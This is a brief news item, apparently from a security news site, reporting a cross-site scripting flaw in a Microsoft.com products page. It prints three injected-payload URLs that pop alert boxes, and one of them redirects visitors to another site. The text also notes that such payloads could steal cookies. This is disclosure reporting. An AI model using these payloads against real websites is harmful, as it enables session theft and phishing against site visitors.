 |
| Cross site scripting vulnerability in Microsoft.com |
Security Researcher @flexxpoint come with interesting find; Microsoft official website(micrsoft.com) is vulnerable to Cross Site Scripting (XSS). The vulnerability is in the Products page url.
http://www.microsoft.com/en-us/together/possibilities.aspx
?hdrFo=mthdr02'"--><svg><script><!>alert('XSS');document.location.replace('http://ehackingnews.com')</script>http://www.microsoft.com/en-us/together/possibilities.aspx
?hdrFo=mthdr02'"--></style></script%<svg><!>3E<script>alert('Simple XSS')</script>
The highlighted code is injected XSS attack code. The above code first popup alert box that says "XSS", following that it will redirect you to the ehackingnews.com website.
The simplified version of the code:
http://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"--><script>alert("XSS")</script>
Replacing this code with malicious javascript allows an attacker to steal cookies or can be used for phishing attack. In past, researcher discovered XSS vulnerability in Ubuntu website also.
 vulnerable to XSS){kind=link}